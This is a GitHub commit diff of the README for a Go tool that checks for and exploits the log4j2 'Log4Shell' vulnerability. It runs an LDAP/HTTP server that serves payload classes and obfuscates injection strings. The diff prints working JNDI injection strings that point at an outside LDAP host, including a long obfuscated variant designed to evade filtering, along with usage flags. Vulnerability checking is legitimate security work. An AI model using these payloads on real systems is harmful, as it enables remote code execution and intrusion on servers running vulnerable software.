Skip to content

Commit f385ced

Browse files
authored
improve Obfuscate malicious(payload) string, update help.
1 parent 4a766c4 commit f385ced

File tree

1 file changed

+23
-10
lines changed

1 file changed

+23
-10
lines changed

README.md

Lines changed: 23 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,7 @@
11
# Log4Shell
2-
* Check, exploit, obfuscate, TLS, ACME in one Go program.
3-
* You don't need to install anything except develop it.
2+
* Check, exploit, obfuscate, TLS, ACME about log4j2 vulnerability in one Go program.
3+
* Support common operating systems, not need install any dependency.
4+
* Don't need to install anything except you want to develop this project.
45

56
## Usage
67
### Start LDAP and HTTP server
@@ -17,19 +18,29 @@
1718
### Obfuscate malicious(payload) string
1819
```
1920
Log4Shell.exe -obf "${jndi:ldap://1.1.1.1:3890/Calc}"
21+
```
22+
```
23+
raw: ${jndi:ldap://1.1.1.1:3890/Calc_27sHQFpxvwFamvBP}
2024
21-
raw: ${jndi:ldap://1.1.1.1:3890/Calc}
25+
${j${Wmmra:CaPId:-nd}${Pd:nmPbJde:vWo9b:MUDN6w:-i:l}dap${73xrLJ:ml9s81:-}${J4T2-fyx2:-:}
26+
/${PU1W:Ojl2xNxM:LZdr6:Rnb:-/1.}1.${R1Edku:MWjEv3bG:ZKMVOC4d5C:hxjRF:-}${5h2bPs:ItU:-1.}
27+
${ogS5N:nmmhQcYA8-axELsuz03:14:-}${rP:8SL:-}${l31C:0X1Ey:-1}${NANl9M:Pfxb2obs9-PU5bDprOX
28+
leb-wHz:-:3}${4MyG:H2h1V2rcTu-P6IDGS4eL:Hk2e:-}${kBUQ:DWF8O:RGSKOognGm:Gcb4g:-890}${kt:R
29+
Nj1QL:LJq3xSbQ-QMJ:-/}${mu9nfI-wJul-thdzcWf5G-1eYs:-}C${Cw:CrVaSz-zv:-alc}_2${Pk-1FL1teD
30+
6OlWC:yIn6DNeu6-8UUF:-7s}${GDuei:4HWSj:Ra31Mg-PZsPG:-HQF}${myZoY-7Oko:-px}${Tc3hLd-XdMY7
31+
:-v}${XaDK4l:oWc:-w}${ZE-TP:-}Fa${2SuF:n465x:-m}${Cdh5xl-hblvwX4Kq:Mj:-v}BP${5V8O-CwErDR
32+
2Ji:UjT:-}}
2233
23-
${jn${Nc3-h17cwiZ-bRU2sh:-di:}${CGPuF-OGZxNU-zZfWp:-l}${wW:sVK9ZUijf:jUelV4upFr:wjD:-}d${OZQ-MqOEGT9K
24-
-IAdC:-ap}${Kce64-15l39K4DD5-xWtee:zY:-:/}${gZm-yFU0:-}${o05ov5-9bU2WWgtlf:PK5:-/}${y7sa1T:aFd6Q7S45r
25-
-KYGD:-}${0dPYxy:IqCd:-1}${YSf-yHfZ:-.1}${Jct1X-kQVdPM:cKmXcaheDfY:kI:-}.${It:CK52YEP-6HC:-1.1}${rzgS
26-
:e1wOc5zHLe-Q1tI2IqBj-G2A:-}:3${NMDyH8-bsqLVD-m0HdT:ik:-}${Bg-2GX6XW:CFHnf:-}${4sqv:HPwwv:-89}0${BzHb
27-
q-JBkQtJ7qDz:L7PaQXH:PUYv91:-/C}${QfhcM:tn:-}${6e-OkiFFt:WtnF:-al}c${etTbi-iWYq-pvATIA6K2K:Rq:-}}
34+
Each string can only be used once, or wait 20 seconds.
35+
```
36+
```
37+
When obfuscate malicious(payload) string, log4j2 package will repeat execute it, the
38+
number of repetitions is equal the number of occurrences about string "${". The LDAP
39+
server add a simple token mechanism for prevent it.
2840
```
2941

3042
## Check
3143
* start Log4Shell server
32-
* put your class file to the payload directory
3344
* send ```${jndi:ldap://1.1.1.1:3890/Nop}```
3445
* send ```${jndi:ldaps://example.com:3890/Nop}``` with TLS
3546

@@ -59,7 +70,7 @@
5970
6071
Usage of Log4Shell.exe:
6172
-auto-cert
62-
use ACME client to sign certificate
73+
use ACME client to sign certificate automatically
6374
-host string
6475
server IP address or domain name (default "127.0.0.1")
6576
-http-addr string
@@ -70,6 +81,8 @@ Usage of Log4Shell.exe:
7081
ldap server address (default ":3890")
7182
-ldap-net string
7283
ldap server network (default "tcp")
84+
-no-token
85+
not add random token when use obfuscate
7386
-obf string
7487
obfuscate malicious(payload) string
7588
-payload string

0 commit comments

Comments
 (0)